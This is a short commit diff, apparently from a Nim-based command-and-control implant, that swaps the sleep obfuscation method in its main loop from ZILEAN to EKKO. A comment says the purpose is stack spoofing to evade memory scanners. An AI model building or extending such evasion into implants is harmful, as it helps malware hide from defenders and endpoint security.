Improved sleep obfuscation cleanup.
This commit is contained in:
@@ -36,7 +36,7 @@ proc main() =
|
||||
while true:
|
||||
|
||||
# Sleep obfuscation with stack spoofing to evade memory scanners
|
||||
sleepObfuscate(ctx.sleep * 1000, ZILEAN)
|
||||
sleepObfuscate(ctx.sleep * 1000, EKKO)
|
||||
# sleep(ctx.sleep * 1000)
|
||||
|
||||
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
|
||||
|
||||
Reference in New Issue
Block a user